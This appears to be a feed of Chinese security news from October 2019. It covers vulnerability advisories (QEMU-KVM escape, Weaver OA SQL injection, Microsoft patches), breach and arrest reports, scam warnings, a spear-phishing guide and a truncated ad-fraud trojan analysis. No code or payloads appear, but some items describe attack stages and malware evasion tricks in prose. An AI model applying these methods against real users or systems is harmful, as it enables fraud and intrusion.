  Tū Ora表示,他们在遭到骇客涂鸭之后立即切断服务器的连线,已与国家网络安全中心及执法单位合作展开调查,并强化系统的安全性,包括把官网移到新平台、加强防毒与电子邮件扫描能力,导入意外分析与管理系统,导入防火墙,还设立了安全操作中心以便未来能即时回应这类的安全威胁,另外他们也开始警告当地用户要小心身份窃盗与诈骗。

9999.jpg

]]>
主流虚拟化平台QEMU-KVM被曝存在漏洞 可完全控制母机及其虚拟机 Wed, 23 Oct 2019 22:13:00 +0800 近日,研究人员发现主流虚拟化平台QEMU-KVM存在严重漏洞,攻击者利用该漏洞在一定条件下可通过子机使母机崩溃,导致拒绝服务,甚至完全控制母机和母机上其他商户虚拟机。据悉,这个漏洞很可能将影响到Google、Amazon等国际公司及国内众多知名厂商。

虚拟机相当于母机上的一个隔离进程,黑客通过漏洞控制母机,实现了从虚拟机到母机上的“越狱”。通过这样“成功的越狱”,黑客借此将可实现对母机上所有虚拟机的批量操作。

因此,这是发生在云上的一场“越狱”。

据悉,研究人员已将该漏洞上报给了linux kernel官方,该漏洞同时被国家信息安全漏洞共享平台(CNVD)收录,综合评级为“高危”,并已经协助linux kernel官方完成漏洞测试和修复,社区及相关厂商也已相继发布安全公告和修复版本。

以往漏洞更多是存在于用户态层面,此次发现的QEMU-KVM漏洞则存在于虚拟化母机内核层面,涉及的权限、造成的影响比用户态层面都要大很多,可以让整个服务器瘫痪,甚至控制母机内核,进而影响服务器上所有商户的业务。

Blade Team技术负责人Cradmin介绍说,虚拟化平台QEMU-KVM的vhost内核模块存在一个缓冲区溢出漏洞,可在虚拟子机热迁移场景下触发。热迁移是云服务厂商为了解决机器故障或优化计算资源的常见操作,可能每天都会进行。攻击者可以借此机会,通过漏洞实现虚拟机逃逸攻击,操纵子机使母机内核崩溃或在物理机内核中执行恶意代码,进而完全控制母机。

云上商户本各自处在互不影响的虚拟机之中,但该漏洞一旦被黑客利用,就可以实现云端“越狱”,控制母机,进而对云平台上的众多商户产生影响。

值得一提的是,各云厂商的热迁移实现机制并不完全相同,不排除存在这样的攻击场景:即使云厂商没有进行主动的热迁移,黑客如果购买了相应的虚拟机,也可通过造成母机过载,主动诱发热迁移,借此完成“虚拟机-母机-云上其他商户”的攻击链路。

然而,该漏洞造成的危害不仅于此。

QEMU-KVM作为云厂商广泛使用的主流虚拟化平台,国内外主流厂商均在使用中,其中不乏Google、Amazon等这样的国际知名厂商,国内众多头部厂商也在广泛使用中。

可以想象,一旦这样的虚拟机内核逃逸漏洞被黑客利用,将会波及到多少公司,又将波及多少用户的信息财产安全。

9999.jpg

]]>
2400多台服务器被非法入侵、控制,东莞网警迅速破案 Wed, 23 Oct 2019 22:13:00 +0800  东莞阳光网讯 根据公安部“净网2019”专项行动工作部署,东莞网警近日破获一宗非法控制计算机信息系统案,抓获编写脚本木马,非法入侵、控制服务器的犯罪嫌疑人陈某,及时阻止了犯罪行为的进一步发生。

  今年9月,东莞市公安局网警支队民警通过侦查发现,某科技公司开发的网络服务器管理软件系统以及全国使用该系统的2400多台服务器被非法入侵、控制。

640.webp.jpg

  办案民警经侦查发现,犯罪嫌疑人陈某通过编写脚本木马攻击目标网站,取得服务器的管理员控制权在广东省公安厅网警总队的统筹部署下,9月25日,东莞网警联合南城分局,在深圳市某小区抓获犯罪嫌疑人陈某。经审讯,陈某对其非法控制计算机信息系统和侵犯公民个人信息的犯罪事实供认不讳。

  据犯罪嫌疑人陈某交代,入侵、控制服务器的主要目的是利用该批服务器资源,实施DDOS攻击和流量劫持等违法犯罪行为。东莞网警及时组织技术力量修补相关漏洞,查杀木马病毒,切实消除安全隐患。

  公安机关经过侦查发现,陈某还利用部分网站“弱口令”等系统管理漏洞,通过系列犯罪手段,在互联网上非法入侵过20个网上贷款网站平台,从中非法获取网络公民个人信息约70万条,并通过“暗网”某论坛发帖贩卖,非法营利12000元人民币。

  目前,陈某已被东莞警方依法刑事拘留,案件还在进一步调查中。警方提醒,相关行业部门一定要加强网站的安全措施,做好相关网站的安全管理工作,及时修复网站相关漏洞,定期升级安全系统,一旦发现系统被入侵,要及时向公安机关报案。

来源:东莞阳光网

9999.jpg

]]>
三星:20多处安全漏洞影响所有Galaxy旗舰机型 Wed, 23 Oct 2019 22:13:00 +0800 北京时间10月9日晚间消息,据国外媒体报道,三星日前证实,发现多处安全漏洞影响Galaxy S8、S9、S10、S10e、S10 Plus、S10 5G、Note 9、Note 10和Note 10 Plus等型号手机。


640.webp.jpg


这其中,包括一个非常严重的漏洞(critical vulnerability ),以及三个被评为“高危”(high)的漏洞。整体而言,它们涉及到约21个安全问题,其中17个与三星“One”用户界面有关,4个与Android有关。


关于Android的漏洞,谷歌上周已经公布,攻击者正利用谷歌Android移动操作系统中的“零日漏洞”进行攻击,该漏洞可以让他们完全控制至少18种不同型号的手机,包括四个型号的Pixel手机,以及三星Galaxy S7、S8和S9。


至于三星的Galaxy特定安全警告,三星最新的安全维护版本(SMR)现已开始向所有Galaxy设备用户推出。10月份的SMR包括来自谷歌的安全补丁,这些补丁会影响Galaxy 10用户以及使用三星早期设备的用户。


此外,还有许多漏洞影响Galaxy 8和Galaxy 9设备用户。这其中,有一个Galaxy 9漏洞被评级为“非常严重”,对Galaxy S9和Note 9都有影响。目前,Galaxy 9销量约为3000万部,而Galaxy Note 9销量约为1000万部,意味着大约有4000万用户受该漏洞影响。

9999.jpg

]]>
警惕!新型网贷骗局瞄准90后尤其毕业生,警惕各种所谓的网贷客服 Wed, 23 Oct 2019 22:13:00 +0800 近期鸭子哥在浏览 V2EX 社区时发现多名网友发帖称接到自称某米贷款客服要求注销账号并将资金转至指定账户。

这些所谓的客服能够非常准确说出用户的姓名、身份证号、电话号码、此前的贷款金额以及贷款的借还款时间等。

显然有这些信息后不少用户轻信这就是某米贷款的客服,然后按客服指引添加微信并清空贷款额度转到指定账户。

这种诈骗套路目前已成功骗到很多90后尤其是刚毕业的学生 , 诈骗犯主要用影响征信为理由恐吓涉世未深的学生。

警惕!新型网贷骗局瞄准90后尤其毕业生,警惕各种所谓的网贷客服

来源:V2EX

警惕!新型网贷骗局瞄准90后尤其毕业生,警惕各种所谓的网贷客服

警惕!新型网贷骗局瞄准90后尤其毕业生,警惕各种所谓的网贷客服

来源:V2EX

不注销账户将影响征信记录?


我们知道正规的网络贷款会将贷款信息同步至人行征信中心,而过多的网贷记录也确实会影响后续的房贷车贷等。

诈骗分子冒充某些知名网贷公司的客服如某 60 借条、某米金融及某期乐等平台致电客服声称需要注销贷款账户。

还有些诈骗分子声称用户信息被他人冒用并借款未还,如果不及时注销账户清空贷款额度将会影响用户征信记录。

很多涉世未深的毕业生接到这种电话后容易被征信记录吓到,于是按照客户要求清空所谓的额度并转给诈骗分子。

熟不知这实际上就是诈骗分子让用户去正规借款平台借款,在借款成功后诱导用户转账并将所有借款卷走的骗局。

警惕!新型网贷骗局瞄准90后尤其毕业生,警惕各种所谓的网贷客服

有人已经损失几十万之多:


目前这种突然爆发的骗局已经引起广州市反诈中心和广东公安的注意,为此广东省公安部门也已经发布安全提醒。

据广东公安微博消息已有多名刚毕业的大学生上当受骗,损失资金全是贷款而来,金额在几万元到几十万元之多。

这些大学生损失的金额本身来自正规的贷款平台,如今被骗也需要按时偿还,否则真的会在征信记录上留下污点。

然而对于刚毕业的大学生来说突然需要偿还几万元甚至几十万元,靠工资显然杯水车薪,这也会让生活更加困难。

当前公安部门已经关注此事建议已经受骗的同学立即在属地进行报警,另外也切记不要轻易向任何个人账户转账。

警惕!新型网贷骗局瞄准90后尤其毕业生,警惕各种所谓的网贷客服

解密所谓的清空贷款额度是什么操作:


最后为方便大家理解这种骗局,蓝点网综合网友发帖和广东公安部门发布的微博详细说说这种网贷诈骗的关键点。

诈骗分子的套路主要有两种:第一是声称公司倒闭需要注销账户;第二是声称用户资料被盗用影响人行征信记录。

诈骗分子核心思想就是诱导用户下载各大贷款应用然后注册登录,通过身份认证后网贷平台会立即返回借款额度。

这时候诈骗分子会要求用户清空贷款额度也就是将所有款项借出,待款项到账后再要求用户将款项转到指定账户。

如果用户已经注册某平台则诈骗分子会声称要登录并注销账户,同样的还是需要将所有贷款额度全部清空和借出。

而在正常流程里用户操作借款时就是认证、评估和获取额度,有额度后直接发起借款通常几分钟内款项就会到账。

用户资料如何泄露是个大问题:


文章开头我们提到用户接到的诈骗电话能够非常准确的报出用户姓名、身份证号甚至毕业院校和已有的贷款流水。

显然用户的贷款信息已经完全泄露才会接到诈骗电话,问题在于贷款记录这类相对私密的信息又是如何被泄露的?

从微博和其他社区来看这次爆发的诈骗涉及多家知名网贷公司 , 除某60、某米、某期乐外某团金融等等也在其中。

看起来诈骗分子想要同时获得这么多知名公司的数据不太可能,所以很有可能是某些小型平台将用户的信息泄露。

诈骗分子利用泄露的信息再去打电话试探用户,尤其是用被冒用贷款影响征信这个借口更能对用户起到恐吓目的。

当然具体用户信息如何泄露的或者说哪些平台泄露的我们不得而知,所以也只能提醒大家时刻保持警惕谨防被骗。

9999.jpg

]]>
【漏洞预警】泛微E-cology OA系统SQL注入漏洞 Wed, 23 Oct 2019 22:13:00 +0800 2019年10月,白帽汇安全研究院观测外网出现泛微办公软件的SQL注入漏洞,攻击者可在未经身份验证的情况下进行攻击,获得系统敏感数据。该漏洞目前属于0day,所有使用了Oracle数据库的泛微网站都有可能受到影响,且利用难度低,危害大(可获取密码等敏感信息),预计会对泛微的主要服务地区——中国市场产生一定冲击。

2222.png

该漏洞是由于OA系统的WorkflowCenterTreeData接口中涉及Oracle数据库的SQL语句缺乏安全检查措施所导致的,任意攻击者都可借SQL语句拼接时机注入恶意payload,造成SQL注入攻击。目前官方尚未发布漏洞补丁,所有使用了Oracle数据库的泛微网站都有可能受到影响,请相关网站管理人员在官方发布补丁前及时下线网站。

概况

目前FOFA系统最新数据(一年内数据)显示全球范围内共有10266个泛微服务(基于jsp语言)。中国大陆使用数量最多,共有10166个,中国香港第二,共有51个,美国第三,共有15个,新加坡第四,共有11个,英国第五,共有4个。

全球范围内泛微服务分布情况如下(仅为分布情况,非漏洞影响情况)。

5555.png

中国大陆地区广东省使用数量最多,共有1559个,四川省第二,共有1014个,河南省第三,共有1008个,江西省第四,共有961个,上海市省第五,共有811个。

4444.png

危害等级

严重

漏洞原理

泛微e-cology OA系统的WorkflowCenterTreeData接口在接收到用户输入时会在未经过安全过滤的情况下直接拼接到SQL语句中,造成SQL注入。

aa.png

(上图来源于网络)

漏洞影响

所有使用了Oracle数据库的泛微服务都有可能存在漏洞。

漏洞POC

目前FOFA客户端平台已经更新该远程命令执行漏洞的检测POC。

3333.png

POC截图

CVE编号

暂无编号

修复建议

由于目前没有官方补丁,请使用了泛微办公软件且后端数据库是Oracle的网站的管理员及时下线网站。

参考

[1] https://www.weaver.com.cn/

[2] https://baike.baidu.com/item/%E6%B3%9B%E5%BE%AE/426156?fr=aladdin

白帽汇从事信息安全,专注于安全大数据、企业威胁情报。

公司产品:FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。

为您提供:网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。

9999.jpg

]]>
鱼叉式网络钓鱼攻击——一份关于攻击动机、技术和预防方法的完整指南 Wed, 23 Oct 2019 22:13:00 +0800 导语:在本指南中,我们将介绍鱼叉式网络钓鱼攻击,包括技术、示例、缓解程序和一些最佳办法。

每天都有成千上万的鱼叉式钓鱼邮件发送给全世界的受害者。

攻击有很多不同的路径,不管怎样攻击,都会对您的网络造成伤害。

所以,准确的、有针对性的进行分析和执行是至关重要的。

在本指南中,我们将介绍鱼叉式网络钓鱼攻击,包括技术、示例、缓解程序和一些最佳办法。

鱼叉式网络钓鱼是什么?

鱼叉式网络钓鱼是一种通过电子邮件活动执行的恶意行为,黑客可以通过电子邮件活动研究用户的目标,了解用户的喜好,并且研究日常运作,通过特殊定制的邮件来窃取敏感数据和安装恶意软件。这种有针对性地部署电子邮件活动称为鱼叉式网络钓鱼攻击。

任何进入收件箱的匿名电子邮件都可以被视为是网络钓鱼攻击。以恶意为目的将数百万封电子邮件发送到电子邮件ID数据库称为网络钓鱼。

它可能用于部署恶意软件、远程代码执行等等,但是,这种网络钓鱼可能对黑客没有好处。

鱼叉式网络钓鱼攻击如何运作?

鱼叉式网络钓鱼分四个阶段执行,

1. 目标识别

2. 研究目标的行为

3. 自定义邮件

4. 发送电子邮件

· 目标识别:

黑客最初通过根据用户的活动动机来缩小他们的范围,从而确定目标受害者,这可能针对某个特定垂直企业或某个医疗保健公司的患者。

识别程序分为两个阶段,主要目标和次要目标,主要目标是为跨国公司工作的高管,他们将接收大量的电子邮件,次要目标将是能够访问业务敏感信息的人。

这些成为鱼叉式网络钓鱼攻击主要目标的受害者,将被操纵以利用次要目标。

· 研究目标的行为:

通过深入挖掘目标的社交媒体资料、工作网站、文件夹、评论、点赞和群组以及他们所属的社区,来收集有关信息。黑客会以某种方式获取他们的个人信息,如电子邮件、电话号码、姓名、工作经历、教育经历、专业领域等,并利用这些信息来影响目标。

· 自定义邮件:

根据从这些外部资源收集的信息,黑客将会定制电子邮件和信息,以获得更好的打开率和降低跳出率。一旦获得成功建立的消息,他们将进行电子邮件爆破程序。

· 发送电子邮件:

在所有的研究之后,黑客将准备他们的攻击媒介和策略,以确保邮件传递到目标的收件箱,而不是邮件的垃圾箱。

他们会将发件人的详细信息伪装,以确保邮件的正确送达,并确保最终用户按预期打开邮件。

打开电子邮件后,用户将根据内容单击链接或下载附件。

通过所有研究,点击率肯定会很高,因为黑客已经设计了非常靠谱的邮件。

钓鱼邮件的3种技术

平时,黑客喜欢以下三种技术中的一种来操纵他们的目标。

1.  模拟。顾名思义,黑客假装是其他人或法人实体来建立信任。这是一种非常常用的技术,把发件人在主题行伪装成一个真实的人或者其他主体。

2. 个性化。这种技术的成功率非常高,因为邮件是为收件人量身定制的,因此他认为这封电子邮件对他或他的职业都是有用的。

3. 情绪反应。这种技术会给人们创造恐惧、快乐、震惊或惊喜,最终用户打开邮件并按计划单击或者下载恶意内容。

举例说明

鱼叉式网络钓鱼攻击的例子非常有针对性,并且通常会给企业带来灾难性后果,以下是几个成功的鱼叉式网络钓鱼攻击的例子。

Ubiquite 网络公司

是由于一位CEO欺诈行为,该公司在2015年支付了超过4,000万美元 。这些电子邮件被冒充为高管人员,将资金转移到香港的第三方,后来被发现是伪装的,而不是真正的第三方。

RSA

RSA是一家领先的安全公司,但不幸的是,他们自己也成为了2011年针对性鱼叉式网络钓鱼攻击的受害者

主题行为“2011招聘计划”的邮件被大量发送给用户,虽然大多数邮件被标记为垃圾邮件,但只要有一个用户打开邮件,就会导致恶意软件下载到受感染的系统中,并最终让黑客远程访问,悄悄的进入计算机和网络。

亚马逊

亚马逊是财富500强公司中的另一个领导者,针对该公司肯定会提高鱼叉式网络钓鱼的成功率。

2015年,黑客针对亚马逊客户发起了一次大规模鱼叉式网络钓鱼攻击,主题为“您的Amazon.com订单已发送”,后面是一些代码。

但是,与亚马逊的普通邮件不同,您可以直接在邮件中或通过您的亚马逊帐户查看发送状态,但这封邮件却涉及到了附件。

很少有员工能成为这种策略的牺牲品,并且在受感染的系统中下载并安装了Locky勒索软件,以加密数据并索要勒索赎金。

如何预防鱼叉式网络钓鱼?

没有一个工具是可以直接抵御网络钓鱼的,对于鱼叉式网络钓鱼重在预防,而预防的方式是一个取决于不同因素的过程,比如意识、工具、教育、情绪反应等。以下是提供给组织和个人的一些预防网络钓鱼的最佳做法:

1. 提高网络安全意识

2. 使用网络工具

3. 识别假电子邮件

4. 避免点击链接和附件

5. 避免急于打开邮件

根据英特尔的报告,97%的人无法识别网络钓鱼邮件。因此,通过提高网络安全意识和改进网络教育来应对鱼叉式网络钓鱼预防才是最好的办法。鱼叉式网络钓鱼预防是一个取决于许多因素及其精确度的过程。

提高网络安全意识:

不论是组织还是个人,都应该提高自己的网络安全意识。因此了解攻击的媒介、机制、程序和过程,可以帮助终端用户和个人为潜在的网络钓鱼做好准备,并确保能避开这些钓鱼行为。

使用网络工具:

正如前面所说,没有任何工具可以抵御网络钓鱼攻击,但正确配置的浏览器策略、电子邮件过滤器和端点配置可以减少成为网络钓鱼诈骗的受害者的机会。此外,针对更强密码和防火墙配置的GPO策略,可以帮助组织保护其用户免受网络钓鱼邮件的侵害。

识别假电子邮件:

用户还可以通过查看主题行、发件人和相关性来区分真假邮件。然后再根据电子邮件的内容二次确认。任何未知的发件人发来的邮件都可能是潜在的网络钓鱼。

避免点击链接和附件:

并不是所有的网络钓鱼都是在邮件打开时起作用的,大多数需要点击邮件中的链接或附件。因此,用户不要轻易点击邮件中的链接及附件。

避免急于打开邮件:

有些邮件会增加用户的紧急情绪,而情绪反应将成为这类网络钓鱼电子邮件的牺牲品。不要一看到关于纳税或者健康指标就恐惧、惊讶或震惊,从而急于打开邮件查看。

鱼叉式网络钓鱼信息图表

鱼叉式网络钓鱼攻击——一份关于攻击动机、技术和预防方法的完整指南

如果你们曾经历过鱼叉式网络钓鱼,欢迎在下面自由评论。

最后提醒您:鱼叉式网络钓鱼攻击很难检测和缓解,因此请保持浏览器和防火墙处于活动状态和并及时进行更新。

转载自: https://www.4hou.com/web/20625.html

9999.jpg



]]>
CNNVD关于微软多个安全漏洞的通报 Wed, 23 Oct 2019 22:13:00 +0800 近日,微软官方发布了多个安全漏洞的公告,包括Windows远程桌面客户端远程代码执行漏洞(CNNVD-201910-454、CVE-2019-1333)、Microsoft XML 远程代码执行漏洞(CNNVD-201910-483、CVE-2019-1060)、Microsoft Excel 远程代码执行漏洞(CNNVD-201910-453、CVE-2019-1331)、Jet 数据库引擎远程代码执行漏洞(CNNVD-201910-491、CVE-2019-1359)(CNNVD-201910-435、CVE-2019-1358)等多个漏洞。成功利用上述漏洞的攻击者可以在目标系统上执行任意代码、获取用户数据,提升权限等。微软多个产品和系统受漏洞影响。目前,微软官方已经发布漏洞修复补丁,建议用户及时确认是否受到漏洞影响,尽快采取修补措施。

一、漏洞介绍

本次漏洞公告涉及MicrosoftWindows系统、Microsoft XML、Microsoft Excel、Jet 数据库、VBScript、Chakra 脚本、Azure App、Windows 远程桌面协议等Windows平台下应用软件和组件。微软多个产品和系统版本受漏洞影响,具体影响范围可访问https://portal.msrc.microsoft.com/zh-cn/security-guidance查询,漏洞详情如下:

1、Windows远程桌面客户端远程代码执行漏洞(CNNVD-201910-454、CVE-2019-1333)

漏洞简介:当用户连接到恶意服务器时,Windows 远程桌面客户端会触发远程代码执行漏洞。若要利用此漏洞,攻击者需要控制服务器,然后利用社会工程学、病毒、中间人攻击等手段诱导用户连接到该服务器。成功利用此漏洞的攻击者可以在目标系统上执行任意代码。攻击者可随后安装程序、查看、更改或删除数据,或者创建拥有完全用户权限的新帐户。

2、Microsoft XML 远程代码执行漏洞(CNNVD-201910-483、CVE-2019-1060)

漏洞简介:当 Microsoft XML Core Services MSXML 分析器处理用户输入时,存在远程代码执行漏洞。攻击者需要诱使用户单击电子邮件或即时消息中的链接以使用户链接到恶意网站,成功利用此漏洞的攻击者可以远程运行恶意代码控制用户的系统。

3、Microsoft Excel 远程代码执行漏洞(CNNVD-201910-453、CVE-2019-1331)

漏洞简介:当 Microsoft Excel 软件无法正确处理内存中的对象时,该软件中存在远程代码执行漏洞。成功利用此漏洞的攻击者可以在当前用户的上下文中运行任意代码。如果当前用户使用管理员权限登录,那么攻击者就可以控制受影响的系统。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。

4、Jet 数据库引擎远程代码执行漏洞(CNNVD-201910-491、CVE-2019-1359)(CNNVD-201910-435、CVE-2019-1358)

漏洞简介:当 Windows Jet 数据库引擎不正确地处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以在受害者系统上执行任意代码,攻击者可以通过诱使受害者打开经特殊设计的文件来利用此漏洞。

5、VBScript 远程代码执行漏洞(CNNVD-201910-475、CVE-2019-1238)(CNNVD-201910-482 、CVE-2019-1239)

漏洞简介:VBScript 引擎处理内存中对象的方式中存在远程代码执行漏洞。成功利用该漏洞的攻击者可以获得与当前用户相同的用户权限。如果当前用户使用管理员用户权限登录,那么攻击者就可以控制受影响的系统。攻击者可随后安装程序、查看、更改或删除数据,或者创建拥有完全用户权限的新帐户。

6、Chakra 脚本引擎内存损坏漏洞(CNNVD-201910-489、CVE-2019-1366)(CNNVD-201910-472、CVE-2019-1307)(CNNVD-201910-470、CVE-2019-1308)(CNNVD-201910-447、CVE-2019-1335)

漏洞简介:Chakra 脚本引擎在 Microsoft Edge 中处理内存中的对象时可能触发该漏洞。成功利用该漏洞的攻击者可以获得与当前用户相同的用户权限。如果当前用户使用管理员权限登录,攻击者便可以任意安装程序、查看、更改或删除数据,或者创建拥有完全用户权限的新帐户。

7、Azure App 服务特权提升漏洞(CNNVD-201910-473、CVE-2019-1372)

漏洞简介:当 Azure App Service/ Antares onAzure Stack 在将内存复制到缓冲区时,如果没有检查缓冲区长度,则会触发特权提升漏洞。成功利用此漏洞的攻击者可允许用户运行未授权的功能,以执行 NT AUTHORITY\system 的环境中的代码,从而逃离沙盒。

8、Windows 映像 API 远程代码执行漏洞(CNNVD-201910-467、CVE-2019-1311)

漏洞简介:当 Windows 映像 API 不正确地处理内存中的对象时,存在远程代码执行漏洞。该漏洞可能以一种使攻击者可以在当前用户环境中执行任意代码的方式损坏内存,为了利用漏洞,攻击者必须诱使用户打开一个专门制作的 WIM 文件。

9、Windows 远程桌面协议 (RDP) 拒绝服务漏洞(CNNVD-201910-461、CVE-2019-13260)

漏洞简介:当攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时,会触发远程桌面协议 (RDP)拒绝服务漏洞。成功利用此漏洞的攻击者可能会导致目标系统上的 RDP 服务停止响应。若要利用此漏洞,攻击者需要诱使目标服务器运行经特殊设计的应用程序。

二、修复建议

目前,微软官方已经发布补丁修复了上述漏洞,建议用户及时确认漏洞影响,尽快采取修补措施。微软官方链接地址如下:

序号漏洞名称官方链接
1            Windows远程桌面客户端远程代码执行漏洞(CNNVD-201910-454、CVE-2019-1333)https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2019-1333            
2            Microsoft XML 远程代码执行漏洞(CNNVD-201910-483、CVE-2019-1060)https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2019-1060            
3            Microsoft Excel 远程代码执行漏洞(CNNVD-201910-453、CVE-2019-1331)https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2019-1331            
4            Jet 数据库引擎远程代码执行漏洞(CNNVD-201910-491、CVE-2019-1359)(CNNVD-201910-435、CVE-2019-1358)https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2019-1359 https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2019-1358            
5            VBScript 远程代码执行漏洞(CNNVD-201910-475、CVE-2019-1238)(CNNVD-201910-482 、CVE-2019-1239)https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2019-1238 https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2019-1239            
6            Chakra 脚本引擎内存损坏漏洞(CNNVD-201910-489、CVE-2019-1366)(CNNVD-201910-472、CVE-2019-1307)(CNNVD-201910-470、CVE-2019-1308)(CNNVD-201910-447、CVE-2019-1335)https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2019-1366 https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2019-1307 https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2019-1308 https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2019-1335            
7            Azure App 服务特权提升漏洞(CNNVD-201910-473、CVE-2019-1372)https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2019-1372            
8            Windows 映像 API 远程代码执行漏洞(CNNVD-201910-467、CVE-2019-1311)https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2019-1311            
9            Windows 远程桌面协议 (RDP) 拒绝服务漏洞(CNNVD-201910-461、CVE-2019-13260)https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2019-1326            

CNNVD将继续跟踪上述漏洞的相关情况,及时发布相关信息。如有需要,可与CNNVD联系。

9999.jpg

]]>
新时代网络安全工作要做好这五点 Wed, 23 Oct 2019 22:13:00 +0800 “随着网络信息技术的持续演进,互联网对整个经济社会发展的渗透、驱动作用越来越明显,带来的风险挑战也在不断扩大。

中央网信办副主任、国家网信办副主任刘烈宏在近日举行的国新办发布会上表示,网络安全威胁和风险日益增多,地下黑产、电信网络诈骗等各类违法犯罪活动时有发生,数据安全和侵犯个人隐私问题日益凸显。
刘烈宏强调,针对关键信息基础设施的有组织高强度网络攻击愈加明显,特别是网络空间与现实世界安全问题不断交织,网络安全问题向现实世界传导,现实世界的安全问题也不断向网络空间蔓延,网络安全问题日益成为影响国家安全、社会稳定和人民群众切身利益的重大战略问题。
没有网络安全就没有国家安全。刘烈宏指出,做好新时代的网络安全工作,重点做好以下几方面的工作:
一是加强数据安全管理和个人信息保护。
加快出台数据安全管理办法、个人信息出境安全评估办法等相关法规制度和标准规范。深入开展APP违法违规收集使用个人信息专项治理,依法严厉打击针对和利用国家大数据资源和个人信息的违法犯罪活动。
二是强化关键信息基础设施的保护。
加快出台关键信息基础设施安全保护条例,落实运营单位主体责任和保护部门的监管责任,统筹开展网络安全检查,强化网络安全态势感知,监测预警和应急处置能力建设。
三是培育扶持网络安全技术产业做大做强。
我们正在加强网络安全技术产业的规划和整体布局,完善支持网络安全技术产业发展的政策措施,培育一批具有国际竞争力的网络安全企业。
四是持之以恒抓好网络安全人才培养。
加强网络空间安全学科专业建设,实施好一流网络安全学院建设示范项目,加快建设国家网络安全人才与创新基地,形成人才培养、技术创新、产业发展的良好生态。
五是积极推动网络空间国际治理。
在全球互联网治理体系变革“四项原则”、构建网络空间命运共同体“五点主张”指引下,深化与各国和相关国际组织的务实合作,深入开展网络安全的对话互动,共同应对网络安全的威胁与挑战,携手构建网络空间命运共同体。

9999.jpg

]]>
火绒安全警报:尚德机构网站页面携带病毒 平台安全审查不可松懈 Wed, 23 Oct 2019 22:13:00 +0800 109日,火绒团队发出安全警告,火绒工程师通过火绒威胁情报系统发现,尚德机构部分省份(91ld.com域名)的在职研究生培训报名服务中心页面携带感染型病毒“Ramnit”。经分析,该病毒或是通过“供应链污染”的方式进行传播,即网站开发者开发环境被病毒感染,导致制作的网页携带病毒。但该病毒仅会感染未开启浏览器安全选项且版本较低的操作系统,因此普通用户不必过于担心。

 

尚德.png

 

如果病毒成功入侵电脑后,会感染电脑中的所有可执行文件和HTML文件,窃取用户上网信息(譬如浏览器cookies等),并且通过这些被感染文件进行重复传播。建议近期登录过上述相关网站的用户,及时下载“火绒安全软件”进行查杀。火绒产品无需升级,即可查杀该病毒。

 

目前,供应链污染正在成为网络平台上病毒传播的一大主要方式,火绒也曾多次发布过相关报道。火绒工程师建议尚德机构尽快排查上述问题,避免出现病毒通过平台进行传播的可能性。另外,此次事件折射出的平台数据安全监管问题,应当引起广大管理人员、开发人员的警惕 ,需要实时加强安全审查力度,必要时通过安装合格的安全软件进行自查,阻止病毒传播。

9999.jpg

]]>
流量e魔病毒分析报告 Wed, 23 Oct 2019 22:13:00 +0800 前言:

近期,腾讯安全实验室捕获一款在用户设备上有异常流量访问应用,此木马在用户设备上存在私自获取设备信息,用户行为隐私数据,后台频繁访问网络请求,云控方式下发刷量插件行为,经过安全人员分析,这批软件属于新发病毒,通过创建低像素窗体让用户难以察觉,所有屏幕触摸,滑动事件会同时响应到隐藏窗体,模拟真实用户网页浏览行为,同时分析用户行为数据欺骗广告主流量统计反作弊算法,实现变相流量欺诈目的,通过视频广告刷量,CPD下载量,周期性拉新服务,赚取广告推广费用等,实现灰色牟利。

逃逸技术:

1.静态检测技术:包名,类名,方法名混淆成特殊符号,字符串隐藏未加密数组,每个类自动化生成不同的加密算法。

2.动态沙箱检测:多种设备状态监控,包括模拟器,流量分析工具,设备是否Root,网络代理分析软件检测,全面识别

非真实用户运行环境。

3.云服务逃逸:将恶意功能剥离成补丁文件并存储在云服务器,通过云端下发热补丁修复方案,云端配置是否下发,在用户端执行恶意功能代码,可以绕过应用安装包检测和增加蜜罐分析的难度。

变现方式:

1.恶意推广应用:从云端获取应用推广任务,对不同用户推广应用。

2.电商平台引流:从云端获引流任务,操控中毒设备推广指定商家产品到用户。

3.视频点击量:后台短时间频繁发送大量网络请求,针对热门视频网站进行刷曝光量。

4.广告作弊刷量:多广告平台叠加,多种类型广告支持刷量,模拟真实用户点击视视增加曝光量,下载,安装,更新等数据上报。

安全威胁:

关键词:主要危害涉及隐私窃取,流量欺诈和云控作恶

一、恶意软件运行流程图

二、样本与感染用户数

2.1恶意应用主要通过下发恶意sdk刷量任务,动态加载的恶意功能模块,补丁等方式加载实现恶意功能,通过动态加载模块关联后台恶意样本top15如下图:

2.2 6月至9月的感染用户变化趋势,平均日影响上万用户。

三、对抗方式分析

3.1静态检测技术逃逸

自写算法或常见对称算法对字符串进行加密,并在运行时还原为原本的字符串,对抗安全检测

通过随机生成包名,类名等,基本属于同款恶意插件,避免安全软件查杀,同样的代码在几份sdk中使用了不同且无规律的包名,代码相似度极高,便开始周期执行恶意功能并启动拉新服务。

3.2动态沙箱检测逃逸

针对http/https设置反代理方案,通过获取当前系统是否处于wifi代理,若代理的IP和Port与设备不一致,直接拦截请求及检测设备是否存在Root权限

3.3云服务逃逸技术

应用在运行过程中打补丁便捷的行为方式,同样也带来安全隐患,完全绕开应用商店策略,补丁代码安全可想而知,在用户不知情的情况下做各种恶意行为,如用户隐私,监听用户行为数据采集等,如图下发补丁方式上报活跃流量

四、刷量业务范围

